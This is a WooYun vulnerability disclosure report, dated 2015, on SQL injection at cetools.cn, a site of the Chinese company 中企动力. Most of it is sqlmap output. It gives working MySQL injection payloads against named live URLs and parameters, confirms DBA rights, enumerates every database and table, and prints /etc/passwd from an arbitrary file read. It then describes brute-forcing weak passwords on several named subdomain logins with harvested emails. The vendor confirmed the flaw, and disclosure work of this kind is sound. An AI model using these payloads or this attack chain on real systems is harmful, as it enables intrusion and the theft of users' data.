当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146096

漏洞标题:中企动力科技股份有限公司某站存在SQL注入(DBA权限读取任意文件\3万多APP用户信息\各子站弱口令爆破)

相关厂商:中企动力科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-12 09:37

修复时间:2015-11-26 09:58

公开时间:2015-11-26 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

利用中企动力某站的SQL注入,收集邮箱,然后在进行子站用户弱口令用户爆破。
3万多APP用户信息几乎全部都是弱口令!~~~

详细说明:

http://www.cetools.cn/index.php/cetools/login


首先burpsuite抓包测试,发现返回错误了!~~~

0.jpg


然后用sqlmap进行测试

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND (SELECT 9607 FROM(SELECT COUNT(*),CONCAT(0x7165
6b6f71,(SELECT (CASE WHEN (9607=9607) THEN 1 ELSE 0 END)),0x716e706771,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IMko'='IMko&
userpass=111111
---
[22:33:13] [INFO] testing MySQL
[22:33:13] [INFO] heuristics detected web page charset 'ascii'
[22:33:13] [WARNING] reflective value(s) found and filtering out
[22:33:13] [INFO] confirming MySQL
[22:33:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[22:33:13] [INFO] fetching current user
[22:33:13] [INFO] retrieved: mazheng@%
current user:    'mazheng@%'
[22:33:13] [INFO] fetching current database
[22:33:13] [INFO] retrieved: zmobile
current database:    'zmobile'
[22:33:13] [INFO] testing if current user is DBA
[22:33:13] [INFO] fetching current user
current user is DBA:    True
available databases [14]:
[*] 15th
[*] 300cn
[*] ce
[*] ce300
[*] ceo8
[*] information_schema
[*] mascot
[*] mysql
[*] quartz
[*] survey
[*] test
[*] yidaba_sicms
[*] zhuanjia
[*] zmobile
Database: 15th
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| users                      | 20487   |
| users_bak                  | 20111   |
| user_score                 | 4993    |
| story_likes                | 3775    |
| cba_vote                   | 3153    |
| lottery_list               | 2459    |
| mascot                     | 1655    |
| company                    | 1267    |
| finalist_shangwu           | 600     |
| question_bank              | 293     |
| finalist_shangwujingli     | 131     |
| story                      | 79      |
| finalist_shangwu_bak       | 76      |
| xianli                     | 75      |
| finalist_zongjian          | 37      |
| cba                        | 10      |
| mascot_type                | 8       |
| lottery_setup              | 4       |
| admin                      | 1       |
+----------------------------+---------+
Database: ce300
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| ce_lynum                   | 1534831 |
| ce_user_actions            | 409816  |
| ce_votekh                  | 273009  |
| ce_valuation               | 271209  |
| ce_votefx                  | 243323  |
| ce_khyx                    | 185060  |
| ce_vote                    | 162495  |
| ce_khyxgj                  | 160302  |
| ce_khyx_copy               | 111598  |
| ce_khyx_copy_2012          | 95714   |
| ce_khtx                    | 95002   |
| ce_user_log                | 74076   |
| ce_khyx_bak3               | 24766   |
| ce_khyx_bak2               | 18193   |
| ce_khyx_bak                | 16623   |
| sms_log                    | 4965    |
| lottery_list               | 4368    |
| area                       | 454     |
| area_copy                  | 451     |
| `area_12-03-21`            | 439     |
| area_bak                   | 437     |
| area_bak_copy              | 437     |
| ce_user_pwxg               | 432     |
| ce_khyxbc                  | 411     |
| ce_qypx_pxzb               | 352     |
| ce_user                    | 335     |
| ce_qypx_bmxx               | 292     |
| user_u2rrelation           | 228     |
| user_rolefinal             | 219     |
| user_user                  | 178     |
| ce_votegs                  | 125     |
| ce_khbm                    | 86      |
| ce_hdgl                    | 85      |
| city_area                  | 83      |
| user_area                  | 83      |
| `city_area-21-03-21`       | 73      |
| city_area_bak              | 71      |
| user_area_                 | 71      |
| ex_trade                   | 50      |
| user_menufinal             | 37      |
| user_menu                  | 35      |
| task_page                  | 34      |
| `4in1`                     | 21      |
| pw_zd                      | 21      |
| user_role                  | 13      |
| user_department            | 12      |
| user_menurole              | 12      |
| user_positon               | 12      |
| user_role2ipower           | 11      |
| user_ipower                | 8       |
| user_opower                | 8       |
| ce_khyxbc_private          | 7       |
| task_column                | 6       |
| user_cpower                | 6       |
| user_module                | 6       |
| lottery_setup              | 4       |
| task_insopdot              | 4       |
| ce_valuation_count         | 1       |
| task_reportrelation        | 1       |
+----------------------------+---------+
Database: ceo8
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| daibiao                    | 3854    |
| daibiao_adds               | 410     |
| bumen                      | 348     |
+----------------------------+---------+
Database: ce
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| ce_professional_vote_log   | 12849995 |
| ce_khbm                    | 22533   |
| ce_khyx                    | 17976   |
| ce_qypx_bmxx               | 5262    |
| ce_qypx_pxzb               | 1654    |
| area                       | 454     |
| area_copy                  | 426     |
| ce_valuation               | 231     |
| user_u2rrelation           | 227     |
| user_rolefinal             | 218     |
| user_user                  | 188     |
| _test                      | 170     |
| ce_hdgl                    | 94      |
| city_area                  | 82      |
| user_area                  | 82      |
| ce_professional_vote       | 61      |
| user_menufinal             | 37      |
| user_menu                  | 35      |
| task_page                  | 34      |
| ce_khyx2                   | 16      |
| user_role                  | 13      |
| user_department            | 12      |
| user_menurole              | 12      |
| user_positon               | 12      |
| user_role2ipower           | 11      |
| user_ipower                | 8       |
| user_opower                | 8       |
| task_column                | 6       |
| user_cpower                | 6       |
| user_module                | 6       |
| task_insopdot              | 4       |
| ce_valuation_count         | 1       |
| task_reportrelation        | 1       |
+----------------------------+---------+
Database: 300cn
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| phome_enewsfile_1          | 366     |
| phome_enewsdolog           | 333     |
| phome_ecms_issue           | 301     |
| phome_ecms_issue_data_1    | 301     |
| phome_ecms_issue_index     | 301     |
| phome_enewstempbak         | 216     |
| phome_enewsf               | 193     |
| phome_ecms_photo           | 132     |
| phome_ecms_photo_data_1    | 132     |
| phome_ecms_photo_index     | 132     |
| phome_enewssearch          | 120     |
| phome_ecms_news_index      | 106     |
| phome_ecms_news            | 105     |
| phome_ecms_news_data_1     | 105     |
| phome_enewsclass           | 94      |
| phome_enewsclass_stats     | 94      |
| phome_enewsclassadd        | 94      |
| phome_ecms_company         | 74      |
| phome_ecms_company_data_1  | 74      |
| phome_ecms_company_index   | 74      |
| phome_enewslog             | 64      |
| phome_enewstempdt          | 56      |
| phome_enewsfeedback        | 48      |
| phome_enewslisttemp        | 26      |
| phome_ecms_district        | 24      |
| phome_ecms_district_data_1 | 24      |
| phome_ecms_district_index  | 24      |
| phome_enewsbq              | 23      |
| phome_enewspage            | 19      |
| phome_enewstable           | 19      |
| phome_enewsbqtemp          | 18      |
| phome_enewsmod             | 18      |
| phome_enewsnewstemp        | 16      |
| phome_enewslink            | 14      |
| phome_enewsuserloginck     | 14      |
| phome_enewsjstemp          | 13      |
| phome_enewsmemberf         | 12      |
| phome_enewsuserjs          | 11      |
| phome_enewsfeedbackf       | 10      |
| phome_ecms_job_type        | 8       |
| phome_ecms_job_type_data_1 | 8       |
| phome_ecms_job_type_index  | 8       |
| phome_enewstempvar         | 8       |
| phome_ecms_job             | 6       |
| phome_ecms_job_data_1      | 6       |
| phome_ecms_job_index       | 6       |
| phome_ecms_position        | 6       |
| phome_ecms_position_data_1 | 6       |
| phome_ecms_position_index  | 6       |
| phome_enewsshoppayfs       | 6       |
| phome_enewsuser            | 6       |
| phome_enewsuseradd         | 6       |
| phome_enewsnotcj           | 5       |
| phome_ecms_enter           | 4       |
| phome_ecms_enter_data_1    | 4       |
| phome_ecms_enter_index     | 4       |
| phome_enewsbqclass         | 4       |
| phome_enewsclassnavcache   | 4       |
| phome_enewsgroup           | 4       |
| phome_enewsmembergroup     | 4       |
| phome_enewspageclass       | 4       |
| phome_enewsplayer          | 4       |
| phome_enewsshopps          | 4       |
| phome_enewsfeedbackclass   | 3       |
| phome_enewspayapi          | 3       |
| phome_enewssearchtemp      | 3       |
| phome_enewsadminstyle      | 2       |
| phome_enewsclasstemp       | 2       |
| phome_enewsmemberform      | 2       |
| phome_enewssearchall       | 2       |
| phome_enewsspacestyle      | 2       |
| phome_enewsvotetemp        | 2       |
| phome_enewswapstyle        | 2       |
| phome_ecms_infoclass_news  | 1       |
| phome_ecms_news_check      | 1       |
| phome_ecms_news_check_data | 1       |
| phome_enewsadclass         | 1       |
| phome_enewsclass_stats_set | 1       |
| phome_enewsdo              | 1       |
| phome_enewsgbookclass      | 1       |
| phome_enewsinfoclass       | 1       |
| phome_enewsloginfail       | 1       |
| phome_enewsmember          | 1       |
| phome_enewsmemberadd       | 1       |
| phome_enewsmoreport        | 1       |
| phome_enewspagetemp        | 1       |
| phome_enewspicclass        | 1       |
| phome_enewspl_set          | 1       |
| phome_enewspltemp          | 1       |
| phome_enewspostserver      | 1       |
| phome_enewsprinttemp       | 1       |
| phome_enewspublic          | 1       |
| phome_enewspublic_update   | 1       |
| phome_enewspubtemp         | 1       |
| phome_enewssearchall_load  | 1       |
| phome_enewsshop_set        | 1       |
| phome_enewstempgroup       | 1       |
| phome_enewsuserclass       | 1       |
| phome_enewsztclass         | 1       |
+----------------------------+---------+
Database: quartz
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| QRTZ_JOB_DETAILS     | 8       |
| QRTZ_TRIGGERS        | 7       |
| QRTZ_CRON_TRIGGERS   | 6       |
| QRTZ_LOCKS           | 5       |
| QRTZ_SCHEDULER_STATE | 2       |
| QRTZ_SIMPLE_TRIGGERS | 1       |
+----------------------+---------+
Database: survey
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| zmobile_speed        | 235     |
| zmobile_company      | 76      |
| zmobile_site         | 1       |
+----------------------+---------+
Database: mysql
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| help_relation        | 1009    |
| help_topic           | 510     |
| help_keyword         | 453     |
| help_category        | 40      |
| `user`               | 15      |
| proc                 | 4       |
| db                   | 2       |
+----------------------+---------+
Database: test
+------------+---------+
| Table      | Entries |
+------------+---------+
| test_sms   | 22      |
+------------+---------+
Database: zhuanjia
+------------+---------+
| Table      | Entries |
+------------+---------+
| vote       | 30      |
| daka       | 11      |
+------------+---------+
Database: zmobile
+------------+---------+
| Table      | Entries |
+------------+---------+
| appuser    | 31922   |
| favorite   | 8314    |
| adminlog   | 2593    |
| article    | 1953    |
| passreset  | 569     |
| article1   | 106     |
| `language` | 2       |
| admin      | 1       |
| demoappver | 1       |
+------------+---------+
Database: yidaba_sicms
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CMS_LOG                     | 329833  |
| TBL_TRS_u$_temp             | 325509  |
| CMS_INFOMATION_RELATION     | 109519  |
| CMS_INFOMATION              | 70854   |
| CMS_TRS_ARTICLE_QUEUE       | 56134   |
| CMS_INFOMATION_SITE_NODE    | 55322   |
| CMS_ARTICLE                 | 55130   |
| CMS_KEYWORD                 | 50737   |
| CMS_COUNT                   | 35694   |
| CMS_IMAGE                   | 26831   |
| CMS_TEMPLATE_FILE           | 6685    |
| RM_AUTHORIZE                | 5932    |
| CMS_TEMPLATE_VERSION        | 5748    |
| RM_RESOURCE                 | 3898    |
| CMS_REP_VALUES              | 2889    |
| CMS_DATA_SOURCE             | 2403    |
| CMS_TEMPLATE_SITE_NODE      | 1943    |
| CMS_SITE_NODE               | 1772    |
| CMS_SITE_NODE_RELATION      | 1772    |
| CMS_FEATURE_PUBLISH         | 1494    |
| cms_article                 | 1468    |
| CMS_TAG_BUNDLE              | 1235    |
| CMS_TEMPLATE                | 1123    |
| CMS_SPECIAL_EDITION_CONTENT | 1114    |
| CMS_COLUMN                  | 1090    |
| CMS_SPECIAL_EDITION         | 585     |
| CMS_HOT_WORD                | 414     |
| RM_CODE_DATA                | 270     |
| RM_PARTY_ROLE               | 233     |
| RM_PARTY                    | 161     |
| CMS_PUBLISH_QUEUE           | 113     |
| RM_USER                     | 95      |
| CMS_CHANNEL                 | 93      |
| CMS_FEATURE_MODULE          | 85      |
| RM_FUNCTION_NODE            | 82      |
| RM_CODE_TYPE                | 54      |
| CMS_CUSTOM_ATTRIBUTE_RULE   | 52      |
| CMS_FEATURE_TABLE           | 48      |
| Zues_Migration              | 38      |
| _ts                         | 35      |
| RM_ROLE                     | 15      |
| CMS_PUBLISH_JAVA_CLASS      | 10      |
| CMS_SHORCUT                 | 6       |
| CMS_SITE_NODE_TYPE          | 6       |
| CMS_CHANNEL_GROUP           | 3       |
| CMS_FEATURE                 | 3       |
| RM_ACCESS_TYPE_RULE         | 3       |
| CMS_LOG_TYPE                | 2       |
| RM_AUTHORIZE_TYPE           | 2       |
| CMS_RSS_RULE                | 1       |
| CMS_SITE                    | 1       |
| CMS_SITE_VIEW               | 1       |
| QRTZ_SCHEDULER_STATE        | 1       |
| RM_ACCESSORIAL_DATA_RULE    | 1       |
+-----------------------------+---------+


Zmobile是中企动力研发的一款基于云平台的企业手机客户端产品,能够帮助企业在手机上宣传品牌,展示产品,联系客户。全触控操作,互动方便,视觉效果美观(页面简洁、唯美),操作简单易用(手机上输入域名直接打开或扫描二维码来访问或安装使用),随时随地通过手机快捷访问,传播企业品牌,展示产品信息或服务。

1.jpg


2.jpg


3.jpg


4.jpg


可读取任意文件

[22:48:08] [INFO] testing MySQL
[22:48:08] [INFO] confirming MySQL
[22:48:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[22:48:08] [INFO] fingerprinting the back-end DBMS operating system
[22:48:08] [INFO] the back-end DBMS operating system is Linux
[22:48:08] [INFO] fetching file: '/etc/passwd'
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[22:48:10] [INFO] heuristics detected web page charset 'ascii'
[22:48:10] [WARNING] reflective value(s) found and filtering out
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:500:500::/home/mysql:/bin/bash
memcached:x:498:499:Memcached daemon:/var/run/memcached:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
hacluster:x:497:498:heartbeat user:/var/lib/heartbeat/cores/hacluster:/sbin/nolo
gin
ntp:x:38:38::/etc/ntp:/sbin/nologin
kaifa:x:501:501::/home/ka
do you want confirmation that the remote file '/etc/passwd' has been successfull
y downloaded from the back-end DBMS file system? [Y/n] y


进入后台后,有参数可以进行SQL注入

http://www.cetools.cn/index.php/example/show_one?id=3677
id存在注入
http://www.cetools.cn/index.php/example/show_one?id=3677'
返回错误
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
update article set pv=pv+1 where id=3677'
Filename: /ce300/page/cetools/models/cetools_admin_demo_model.php
Line Number: 74


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3677 AND 1680=1680
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=3677 AND (SELECT 8189 FROM(SELECT COUNT(*),CONCAT(0x716a6f7271,(
SELECT (CASE WHEN (8189=8189) THEN 1 ELSE 0 END)),0x7162756d71,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=3677 AND SLEEP(5)
---
[02:08:06] [INFO] testing MySQL
[02:08:07] [INFO] heuristics detected web page charset 'ascii'
[02:08:07] [WARNING] reflective value(s) found and filtering out
[02:08:07] [INFO] confirming MySQL
[02:08:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[02:08:08] [INFO] fetching current user
[02:08:09] [INFO] retrieved: mazheng@%
current user:    'mazheng@%'
[02:08:09] [INFO] fetching current database
[02:08:09] [INFO] retrieved: zmobile
current database:    'zmobile'
[02:08:09] [INFO] testing if current user is DBA
[02:08:09] [INFO] fetching current user
current user is DBA:    True


利用上述SQL注入得到的用户或者邮箱信息,对以下几个子站进行弱口令用户爆破
主站也测试看看

http://www.cetools.cn/index.php/cetools/login


爆破1.jpg


爆破2.jpg


爆破3.jpg


爆破4.jpg


1、

http://ku.cetools.cn/login.asp


ku2645.jpg


ku大于2645小于2782.jpg


2、

http://fy.cetools.cn/login.asp


1.jpg


2.jpg


3.jpg


3、

http://share.cetools.cn/index/login.asp


1.jpg


2.jpg


基本上每个子站都有100左右的123456弱口令用户(至少在测试的1000多个里面),就不将其贴出来了,厂商自己排查吧!~~~

漏洞证明:

如上

修复方案:

过滤修复
修改弱口令

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-12 09:56

厂商回复:

正在处理

最新状态:

暂无